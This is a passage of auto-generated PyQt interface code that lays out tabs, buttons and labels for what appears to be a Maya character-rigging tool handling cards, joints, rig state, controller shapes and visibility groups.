self.horizontalLayout_19.setObjectName("horizontalLayout_19")
self.connections_save = QtWidgets.QPushButton(self.tab_5)
self.connections_save.setObjectName("connections_save")
self.horizontalLayout_19.addWidget(self.connections_save)
self.connections_load = QtWidgets.QPushButton(self.tab_5)
self.connections_load.setObjectName("connections_load")
self.horizontalLayout_19.addWidget(self.connections_load)
self.verticalLayout_22.addLayout(self.horizontalLayout_19)
self.connectionsField = QtWidgets.QTextEdit(self.tab_5)
self.connectionsField.setObjectName("connectionsField")
self.verticalLayout_22.addWidget(self.connectionsField)
self.rigStateTab.addTab(self.tab_5, "")
self.tab_9 = QtWidgets.QWidget()
self.tab_9.setObjectName("tab_9")
self.verticalLayout_23 = QtWidgets.QVBoxLayout(self.tab_9)
self.verticalLayout_23.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_23.setObjectName("verticalLayout_23")
self.horizontalLayout_20 = QtWidgets.QHBoxLayout()
self.horizontalLayout_20.setObjectName("horizontalLayout_20")
self.driven_save = QtWidgets.QPushButton(self.tab_9)
self.driven_save.setObjectName("driven_save")
self.horizontalLayout_20.addWidget(self.driven_save)
self.driven_load = QtWidgets.QPushButton(self.tab_9)
self.driven_load.setObjectName("driven_load")
self.horizontalLayout_20.addWidget(self.driven_load)
self.verticalLayout_23.addLayout(self.horizontalLayout_20)
self.setDrivenField = QtWidgets.QTextEdit(self.tab_9)
self.setDrivenField.setObjectName("setDrivenField")
self.verticalLayout_23.addWidget(self.setDrivenField)
self.rigStateTab.addTab(self.tab_9, "")
self.tab_10 = QtWidgets.QWidget()
self.tab_10.setObjectName("tab_10")
self.verticalLayout_24 = QtWidgets.QVBoxLayout(self.tab_10)
self.verticalLayout_24.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_24.setObjectName("verticalLayout_24")
self.horizontalLayout_21 = QtWidgets.QHBoxLayout()
self.horizontalLayout_21.setObjectName("horizontalLayout_21")
self.custom_save = QtWidgets.QPushButton(self.tab_10)
self.custom_save.setObjectName("custom_save")
self.horizontalLayout_21.addWidget(self.custom_save)
self.custom_load = QtWidgets.QPushButton(self.tab_10)
self.custom_load.setObjectName("custom_load")
self.horizontalLayout_21.addWidget(self.custom_load)
self.verticalLayout_24.addLayout(self.horizontalLayout_21)
self.customAttrsField = QtWidgets.QTextEdit(self.tab_10)
self.customAttrsField.setObjectName("customAttrsField")
self.verticalLayout_24.addWidget(self.customAttrsField)
self.rigStateTab.addTab(self.tab_10, "")
self.tab_11 = QtWidgets.QWidget()
self.tab_11.setObjectName("tab_11")
self.verticalLayout_25 = QtWidgets.QVBoxLayout(self.tab_11)
self.verticalLayout_25.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_25.setObjectName("verticalLayout_25")
self.horizontalLayout_22 = QtWidgets.QHBoxLayout()
self.horizontalLayout_22.setObjectName("horizontalLayout_22")
self.locked_save = QtWidgets.QPushButton(self.tab_11)
self.locked_save.setObjectName("locked_save")
self.horizontalLayout_22.addWidget(self.locked_save)
self.locked_load = QtWidgets.QPushButton(self.tab_11)
self.locked_load.setObjectName("locked_load")
self.horizontalLayout_22.addWidget(self.locked_load)
self.verticalLayout_25.addLayout(self.horizontalLayout_22)
self.lockedAttrsField = QtWidgets.QTextEdit(self.tab_11)
self.lockedAttrsField.setObjectName("lockedAttrsField")
self.verticalLayout_25.addWidget(self.lockedAttrsField)
self.rigStateTab.addTab(self.tab_11, "")
self.verticalLayout_6.addWidget(self.rigStateTab)
self.verticalLayout_5.addWidget(self.rigStateContainer)
self.verticalLayout_5.setStretch(2, 1)
self.horizontalLayout_2.addWidget(self.splitter_2)
self.tabWidget.addTab(self.tab_3, "")
self.controller_edit = QtWidgets.QWidget()
self.controller_edit.setObjectName("controller_edit")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.controller_edit)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setContentsMargins(25, 25, 25, 25)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.verticalLayout_16 = QtWidgets.QVBoxLayout()
self.verticalLayout_16.setContentsMargins(25, -1, -1, -1)
self.verticalLayout_16.setObjectName("verticalLayout_16")
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.verticalLayout_14 = QtWidgets.QVBoxLayout()
self.verticalLayout_14.setContentsMargins(0, -1, -1, -1)
self.verticalLayout_14.setObjectName("verticalLayout_14")
self.label_5 = QtWidgets.QLabel(self.controller_edit)
self.label_5.setObjectName("label_5")
self.verticalLayout_14.addWidget(self.label_5)
self.scrollArea = QtWidgets.QScrollArea(self.controller_edit)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 341, 97))
self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.gridLayout_4 = QtWidgets.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_4.setObjectName("gridLayout_4")
self.shape_chooser = QtWidgets.QGridLayout()
self.shape_chooser.setObjectName("shape_chooser")
self.gridLayout_4.addLayout(self.shape_chooser, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout_14.addWidget(self.scrollArea)
self.horizontalLayout_10.addLayout(self.verticalLayout_14)
self.verticalLayout_15 = QtWidgets.QVBoxLayout()
self.verticalLayout_15.setContentsMargins(0, -1, -1, -1)
self.verticalLayout_15.setObjectName("verticalLayout_15")
self.label_11 = QtWidgets.QLabel(self.controller_edit)
self.label_11.setObjectName("label_11")
self.verticalLayout_15.addWidget(self.label_11)
self.surfaceColorGrid = QtWidgets.QGridLayout()
self.surfaceColorGrid.setObjectName("surfaceColorGrid")
self.verticalLayout_15.addLayout(self.surfaceColorGrid)
self.surfaceColorLayout = QtWidgets.QGridLayout()
self.surfaceColorLayout.setContentsMargins(-1, -1, -1, 55)
self.surfaceColorLayout.setObjectName("surfaceColorLayout")
self.verticalLayout_15.addLayout(self.surfaceColorLayout)
self.label_12 = QtWidgets.QLabel(self.controller_edit)
self.label_12.setObjectName("label_12")
self.verticalLayout_15.addWidget(self.label_12)
self.curveColorGrid = QtWidgets.QGridLayout()
self.curveColorGrid.setObjectName("curveColorGrid")
self.verticalLayout_15.addLayout(self.curveColorGrid)
self.curveColorLayout = QtWidgets.QGridLayout()
self.curveColorLayout.setObjectName("curveColorLayout")
self.verticalLayout_15.addLayout(self.curveColorLayout)
self.horizontalLayout_10.addLayout(self.verticalLayout_15)
self.verticalLayout_16.addLayout(self.horizontalLayout_10)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.verticalLayout_8 = QtWidgets.QVBoxLayout()
self.verticalLayout_8.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.gridLayout_3 = QtWidgets.QGridLayout()
self.gridLayout_3.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label_13 = QtWidgets.QLabel(self.controller_edit)
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.label_13.setObjectName("label_13")
self.gridLayout_3.addWidget(self.label_13, 0, 0, 1, 1)
self.label_14 = QtWidgets.QLabel(self.controller_edit)
self.label_14.setAlignment(QtCore.Qt.AlignCenter)
self.label_14.setObjectName("label_14")
self.gridLayout_3.addWidget(self.label_14, 0, 1, 1, 1)
self.copyShapes = QtWidgets.QPushButton(self.controller_edit)
self.copyShapes.setObjectName("copyShapes")
self.gridLayout_3.addWidget(self.copyShapes, 1, 0, 1, 1)
self.label_7 = QtWidgets.QLabel(self.controller_edit)
self.label_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_7.setObjectName("label_7")
self.gridLayout_3.addWidget(self.label_7, 0, 2, 1, 1)
self.select_cvs = QtWidgets.QPushButton(self.controller_edit)
self.select_cvs.setObjectName("select_cvs")
self.gridLayout_3.addWidget(self.select_cvs, 1, 2, 1, 1)
self.copyToCBBtn = QtWidgets.QPushButton(self.controller_edit)
self.copyToCBBtn.setObjectName("copyToCBBtn")
self.gridLayout_3.addWidget(self.copyToCBBtn, 1, 1, 1, 1)
self.pasteLocalBtn = QtWidgets.QPushButton(self.controller_edit)
self.pasteLocalBtn.setObjectName("pasteLocalBtn")
self.gridLayout_3.addWidget(self.pasteLocalBtn, 2, 1, 1, 1)
self.pasteWorldBtn = QtWidgets.QPushButton(self.controller_edit)
self.pasteWorldBtn.setObjectName("pasteWorldBtn")
self.gridLayout_3.addWidget(self.pasteWorldBtn, 3, 1, 1, 1)
self.select_band_edge_1 = QtWidgets.QPushButton(self.controller_edit)
self.select_band_edge_1.setObjectName("select_band_edge_1")
self.gridLayout_3.addWidget(self.select_band_edge_1, 3, 2, 1, 1)
self.mirrorShapes = QtWidgets.QPushButton(self.controller_edit)
self.mirrorShapes.setObjectName("mirrorShapes")
self.gridLayout_3.addWidget(self.mirrorShapes, 2, 0, 1, 1)
self.mirrorSide = QtWidgets.QPushButton(self.controller_edit)
self.mirrorSide.setObjectName("mirrorSide")
self.gridLayout_3.addWidget(self.mirrorSide, 3, 0, 1, 1)
self.select_pin_head = QtWidgets.QPushButton(self.controller_edit)
self.select_pin_head.setObjectName("select_pin_head")
self.gridLayout_3.addWidget(self.select_pin_head, 2, 2, 1, 1)
self.select_band_edge_2 = QtWidgets.QPushButton(self.controller_edit)
self.select_band_edge_2.setObjectName("select_band_edge_2")
self.gridLayout_3.addWidget(self.select_band_edge_2, 4, 2, 1, 1)
self.copyColor = QtWidgets.QPushButton(self.controller_edit)
self.copyColor.setObjectName("copyColor")
self.gridLayout_3.addWidget(self.copyColor, 4, 0, 1, 1)
self.verticalLayout_8.addLayout(self.gridLayout_3)
self.label_9 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_9.sizePolicy().hasHeightForWidth())
self.label_9.setSizePolicy(sizePolicy)
self.label_9.setAlignment(QtCore.Qt.AlignCenter)
self.label_9.setObjectName("label_9")
self.verticalLayout_8.addWidget(self.label_9)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.minus_ten = QtWidgets.QPushButton(self.controller_edit)
self.minus_ten.setObjectName("minus_ten")
self.horizontalLayout_11.addWidget(self.minus_ten)
self.minus_one = QtWidgets.QPushButton(self.controller_edit)
self.minus_one.setObjectName("minus_one")
self.horizontalLayout_11.addWidget(self.minus_one)
self.plus_one = QtWidgets.QPushButton(self.controller_edit)
self.plus_one.setObjectName("plus_one")
self.horizontalLayout_11.addWidget(self.plus_one)
self.plus_ten = QtWidgets.QPushButton(self.controller_edit)
self.plus_ten.setObjectName("plus_ten")
self.horizontalLayout_11.addWidget(self.plus_ten)
self.verticalLayout_8.addLayout(self.horizontalLayout_11)
self.label_10 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_10.sizePolicy().hasHeightForWidth())
self.label_10.setSizePolicy(sizePolicy)
self.label_10.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignHCenter)
self.label_10.setObjectName("label_10")
self.verticalLayout_8.addWidget(self.label_10)
self.gridLayout_5 = QtWidgets.QGridLayout()
self.gridLayout_5.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_5.setObjectName("gridLayout_5")
self.rot_local_y = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_y.setObjectName("rot_local_y")
self.gridLayout_5.addWidget(self.rot_local_y, 2, 0, 1, 1)
self.label_6 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6.sizePolicy().hasHeightForWidth())
self.label_6.setSizePolicy(sizePolicy)
self.label_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_6.setObjectName("label_6")
self.gridLayout_5.addWidget(self.label_6, 0, 0, 1, 1)
self.label_8 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8.sizePolicy().hasHeightForWidth())
self.label_8.setSizePolicy(sizePolicy)
self.label_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_8.setObjectName("label_8")
self.gridLayout_5.addWidget(self.label_8, 0, 1, 1, 1)
self.rot_world_x = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_x.setObjectName("rot_world_x")
self.gridLayout_5.addWidget(self.rot_world_x, 1, 1, 1, 1)
self.rot_local_x = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_x.setObjectName("rot_local_x")
self.gridLayout_5.addWidget(self.rot_local_x, 1, 0, 1, 1)
self.rot_world_y = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_y.setObjectName("rot_world_y")
self.gridLayout_5.addWidget(self.rot_world_y, 2, 1, 1, 1)
self.rot_local_z = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_z.setObjectName("rot_local_z")
self.gridLayout_5.addWidget(self.rot_local_z, 3, 0, 1, 1)
self.rot_world_z = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_z.setObjectName("rot_world_z")
self.gridLayout_5.addWidget(self.rot_world_z, 3, 1, 1, 1)
self.verticalLayout_8.addLayout(self.gridLayout_5)
self.horizontalLayout_3.addLayout(self.verticalLayout_8)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem3)
self.verticalLayout_16.addLayout(self.horizontalLayout_3)
self.horizontalLayout_9.addLayout(self.verticalLayout_16)
self.controlCardList = QtWidgets.QTreeWidget(self.controller_edit)
self.controlCardList.setObjectName("controlCardList")
self.controlCardList.headerItem().setText(0, "1")
self.controlCardList.header().setVisible(False)
self.horizontalLayout_9.addWidget(self.controlCardList)
self.verticalLayout_13.addLayout(self.horizontalLayout_9)
spacerItem4 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_13.addItem(spacerItem4)
self.shapeDebug = QtWidgets.QTextEdit(self.controller_edit)
self.shapeDebug.setEnabled(True)
self.shapeDebug.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.shapeDebug.setObjectName("shapeDebug")
self.verticalLayout_13.addWidget(self.shapeDebug)
self.verticalLayout_7.addLayout(self.verticalLayout_13)
self.tabWidget.addTab(self.controller_edit, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.visGroups = QtWidgets.QListWidget(self.tab_4)
self.visGroups.setGeometry(QtCore.QRect(10, 10, 256, 381))
self.visGroups.setObjectName("visGroups")
self.verticalLayoutWidget_6 = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget_6.setGeometry(QtCore.QRect(280, 10, 341, 381))
self.verticalLayoutWidget_6.setObjectName("verticalLayoutWidget_6")
self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_6)
self.verticalLayout_9.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.unequipVisControl = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.unequipVisControl.setObjectName("unequipVisControl")
self.verticalLayout_9.addWidget(self.unequipVisControl)
self.equipVisControl = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.equipVisControl.setObjectName("equipVisControl")
self.verticalLayout_9.addWidget(self.equipVisControl)
self.pruneVisGroups = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.pruneVisGroups.setObjectName("pruneVisGroups")
self.verticalLayout_9.addWidget(self.pruneVisGroups)
self.widget_3 = QtWidgets.QWidget(self.verticalLayoutWidget_6)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget_3.sizePolicy().hasHeightForWidth())
self.widget_3.setSizePolicy(sizePolicy)
self.widget_3.setMinimumSize(QtCore.QSize(0, 100))
self.widget_3.setMaximumSize(QtCore.QSize(16777215, 100))
self.widget_3.setObjectName("widget_3")
self.verticalLayout_9.addWidget(self.widget_3)
self.tagAsMain = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.tagAsMain.setObjectName("tagAsMain")
self.verticalLayout_9.addWidget(self.tagAsMain)
spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_9.addItem(spacerItem5)
self.verticalLayoutWidget_7 = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget_7.setGeometry(QtCore.QRect(10, 400, 611, 151))
self.verticalLayoutWidget_7.setObjectName("verticalLayoutWidget_7")
self.verticalLayout_10 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_7)
self.verticalLayout_10.setContentsMargins(-1, -1, -1, 0)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget_7)
self.label_3.setObjectName("label_3")
self.verticalLayout_10.addWidget(self.label_3)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, -1, 0, 0)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.visGroupNameEntry = QtWidgets.QLineEdit(self.verticalLayoutWidget_7)
self.visGroupNameEntry.setObjectName("visGroupNameEntry")
self.horizontalLayout_4.addWidget(self.visGroupNameEntry)
self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_7)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.groupLevel = QtWidgets.QSpinBox(self.verticalLayoutWidget_7)
self.groupLevel.setMinimum(1)
self.groupLevel.setObjectName("groupLevel")
self.horizontalLayout_4.addWidget(self.groupLevel)
self.assignVisGroup = QtWidgets.QPushButton(self.verticalLayoutWidget_7)
self.assignVisGroup.setObjectName("assignVisGroup")
self.horizontalLayout_4.addWidget(self.assignVisGroup)
self.verticalLayout_10.addLayout(self.horizontalLayout_4)
spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_10.addItem(spacerItem6)
self.tabWidget.addTab(self.tab_4, "")
self.space_tab = QtWidgets.QWidget()
self.space_tab.setObjectName("space_tab")
self.verticalLayout_17 = QtWidgets.QVBoxLayout(self.space_tab)
self.verticalLayout_17.setObjectName("verticalLayout_17")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.verticalLayout_18 = QtWidgets.QVBoxLayout()
self.verticalLayout_18.setContentsMargins(-1, -1, -1, 0)
self.verticalLayout_18.setObjectName("verticalLayout_18")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.spaceList = QtWidgets.QListWidget(self.space_tab)
self.spaceList.setObjectName("spaceList")
self.verticalLayout_12.addWidget(self.spaceList)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.spaceUp = QtWidgets.QPushButton(self.space_tab)
self.spaceUp.setObjectName("spaceUp")
self.horizontalLayout_8.addWidget(self.spaceUp)
self.spaceDown = QtWidgets.QPushButton(self.space_tab)
self.spaceDown.setObjectName("spaceDown")
self.horizontalLayout_8.addWidget(self.spaceDown)
self.verticalLayout_12.addLayout(self.horizontalLayout_8)
self.horizontalLayout_5.addLayout(self.verticalLayout_12)
self.verticalLayout_18.addLayout(self.horizontalLayout_5)
self.spaceQuickButtons = QtWidgets.QGridLayout()
self.spaceQuickButtons.setObjectName("spaceQuickButtons")
self.verticalLayout_18.addLayout(self.spaceQuickButtons)
self.label_17 = QtWidgets.QLabel(self.space_tab)
self.label_17.setObjectName("label_17")
self.verticalLayout_18.addWidget(self.label_17)
self.multiWeights = QtWidgets.QTableWidget(self.space_tab)
self.multiWeights.setEnabled(False)
self.multiWeights.setColumnCount(2)
self.multiWeights.setObjectName("multiWeights")
self.multiWeights.setColumnCount(2)
self.multiWeights.setRowCount(0)
self.multiWeights.horizontalHeader().setVisible(False)
self.verticalLayout_18.addWidget(self.multiWeights)
self.horizontalLayout_12.addLayout(self.verticalLayout_18)
spacerItem7 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem7)
self.verticalLayout_17.addLayout(self.horizontalLayout_12)
self.tabWidget.addTab(self.space_tab, "")
self.horizontalLayout.addWidget(self.tabWidget)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 991, 21))
self.menubar.setObjectName("menubar")
self.menuTools = QtWidgets.QMenu(self.menubar)
self.menuTools.setObjectName("menuTools")
self.menuVisibility = QtWidgets.QMenu(self.menuTools)
self.menuVisibility.setObjectName("menuVisibility")
self.menuSettings = QtWidgets.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionCard_Orients = QtWidgets.QAction(MainWindow)
self.actionCard_Orients.setCheckable(True)
self.actionCard_Orients.setObjectName("actionCard_Orients")
self.actionReconnect_Real_Joints = QtWidgets.QAction(MainWindow)
self.actionReconnect_Real_Joints.setObjectName("actionReconnect_Real_Joints")
self.actionCard_Orients_2 = QtWidgets.QAction(MainWindow)
self.actionCard_Orients_2.setCheckable(True)
self.actionCard_Orients_2.setObjectName("actionCard_Orients_2")
self.actionConnectors = QtWidgets.QAction(MainWindow)
self.actionConnectors.setCheckable(True)
self.actionConnectors.setObjectName("actionConnectors")
self.actionHandles = QtWidgets.QAction(MainWindow)
self.actionHandles.setCheckable(True)
self.actionHandles.setObjectName("actionHandles")
self.actionMatch_Selected_Orients = QtWidgets.QAction(MainWindow)
self.actionMatch_Selected_Orients.setObjectName("actionMatch_Selected_Orients")
self.actionNaming_Rules = QtWidgets.QAction(MainWindow)
self.actionNaming_Rules.setObjectName("actionNaming_Rules")
self.actionShow_Individual_Restores = QtWidgets.QAction(MainWindow)
self.actionShow_Individual_Restores.setCheckable(True)
self.actionShow_Individual_Restores.setObjectName("actionShow_Individual_Restores")
self.actionShow_Card_Rig_State = QtWidgets.QAction(MainWindow)
self.actionShow_Card_Rig_State.setCheckable(True)
self.actionShow_Card_Rig_State.setObjectName("actionShow_Card_Rig_State")
self.menuVisibility.addAction(self.actionCard_Orients_2)
self.menuVisibility.addAction(self.actionConnectors)
self.menuVisibility.addAction(self.actionHandles)
self.menuTools.addAction(self.actionReconnect_Real_Joints)
self.menuTools.addAction(self.menuVisibility.menuAction())
self.menuTools.addAction(self.actionMatch_Selected_Orients)
self.menuSettings.addAction(self.actionNaming_Rules)
self.menuSettings.addAction(self.actionShow_Individual_Restores)
self.menuSettings.addAction(self.actionShow_Card_Rig_State)
self.menubar.addAction(self.menuTools.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
self.rigStateTab.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtCompat.translate("MainWindow", "MainWindow", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtCompat.translate("MainWindow", "Start", None, -1))
self.buildBonesBtn.setText(QtCompat.translate("MainWindow", "Build Bones", None, -1))
self.buildRigBtn.setText(QtCompat.translate("MainWindow", "Build Rig", None, -1))
self.selectAllBtn.setText(QtCompat.translate("MainWindow", "Select All", None, -1))
self.deleteRigBtn.setText(QtCompat.translate("MainWindow", "Delete Rig", None, -1))
self.deleteBonesBtn.setText(QtCompat.translate("MainWindow", "Delete Bones", None, -1))
self.saveModsBtn.setText(QtCompat.translate("MainWindow", "Save Mods", None, -1))
self.restoreModsBtn.setText(QtCompat.translate("MainWindow", "Restore Mods", None, -1))
self.makeCardBtn.setText(QtCompat.translate("MainWindow", "Make Card", None, -1))
self.rebuildProxyBtn.setText(QtCompat.translate("MainWindow", "Rebuild Proxy", None, -1))
self.constraintsRestore.setText(QtCompat.translate("MainWindow", "Const", None, -1))
self.lockedAttrsRestore.setText(QtCompat.translate("MainWindow", "Locked", None, -1))
self.spacesRestore.setText(QtCompat.translate("MainWindow", "Space", None, -1))
self.pushButton_3.setText(QtCompat.translate("MainWindow", "Shape", None, -1))
self.visGroupRestore.setText(QtCompat.translate("MainWindow", "Vis", None, -1))
self.connectionsRestore.setText(QtCompat.translate("MainWindow", "Conn", None, -1))
self.setDrivenRestore.setText(QtCompat.translate("MainWindow", "Driven", None, -1))
self.customAttrsRestore.setText(QtCompat.translate("MainWindow", "Attrs", None, -1))
self.cardLister.headerItem().setText(0, QtCompat.translate("MainWindow", "Name", None, -1))
self.cardLister.headerItem().setText(1, QtCompat.translate("MainWindow", "Vis", None, -1))
self.cardLister.headerItem().setText(2, QtCompat.translate("MainWindow", "Type", None, -1))
self.cardLister.headerItem().setText(3, QtCompat.translate("MainWindow", "Start", None, -1))
self.cardLister.headerItem().setText(4, QtCompat.translate("MainWindow", "Repeat", None, -1))
self.cardLister.headerItem().setText(5, QtCompat.translate("MainWindow", "End", None, -1))
self.cardLister.headerItem().setText(6, QtCompat.translate("MainWindow", "Mirror", None, -1))
self.cardLister.headerItem().setText(7, QtCompat.translate("MainWindow", "Side", None, -1))
self.mergeCardBtn.setText(QtCompat.translate("MainWindow", "Merge", None, -1))
self.label.setText(QtCompat.translate("MainWindow", "Cards", None, -1))
self.splitCardBtn.setText(QtCompat.translate("MainWindow", "Split", None, -1))
self.addCardIkButton.setText(QtCompat.translate("MainWindow", "Add Card Ik", None, -1))
self.label_2.setText(QtCompat.translate("MainWindow", "Joints", None, -1))
self.duplicateCardBtn.setText(QtCompat.translate("MainWindow", "Duplicate", None, -1))
self.remCardIkButton.setText(QtCompat.translate("MainWindow", "Rem Card Ik", None, -1))
self.insertJointBtn.setText(QtCompat.translate("MainWindow", "Insert Child", None, -1))
self.addTipBtn.setText(QtCompat.translate("MainWindow", "Add Tip", None, -1))
self.deleteJointBtn.setText(QtCompat.translate("MainWindow", "Delete", None, -1))
self.customUpBtn.setText(QtCompat.translate("MainWindow", "Custom Up", None, -1))
self.jointLister.horizontalHeaderItem(0).setText(QtCompat.translate("MainWindow", "Name", None, -1))
self.jointLister.horizontalHeaderItem(1).setText(QtCompat.translate("MainWindow", "Helper", None, -1))
self.jointLister.horizontalHeaderItem(2).setText(QtCompat.translate("MainWindow", "Output", None, -1))
self.jointLister.horizontalHeaderItem(3).setText(QtCompat.translate("MainWindow", "Handles", None, -1))
self.jointLister.horizontalHeaderItem(4).setText(QtCompat.translate("MainWindow", "Orient To", None, -1))
self.jointLister.horizontalHeaderItem(5).setText(QtCompat.translate("MainWindow", "Child Of", None, -1))
self.cardParams.horizontalHeaderItem(0).setText(QtCompat.translate("MainWindow", "1", None, -1))
self.cardParams.horizontalHeaderItem(1).setText(QtCompat.translate("MainWindow", "2", None, -1))
self.updateRigState.setText(QtCompat.translate("MainWindow", "Update", None, -1))
self.space_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.space_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_2), QtCompat.translate("MainWindow", "Space", None, -1))
self.vis_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.vis_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_8), QtCompat.translate("MainWindow", "Vis", None, -1))
self.shape_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.shape_local_load.setText(QtCompat.translate("MainWindow", "Load Local", None, -1))
self.shape_world_load.setText(QtCompat.translate("MainWindow", "Load World", None, -1))
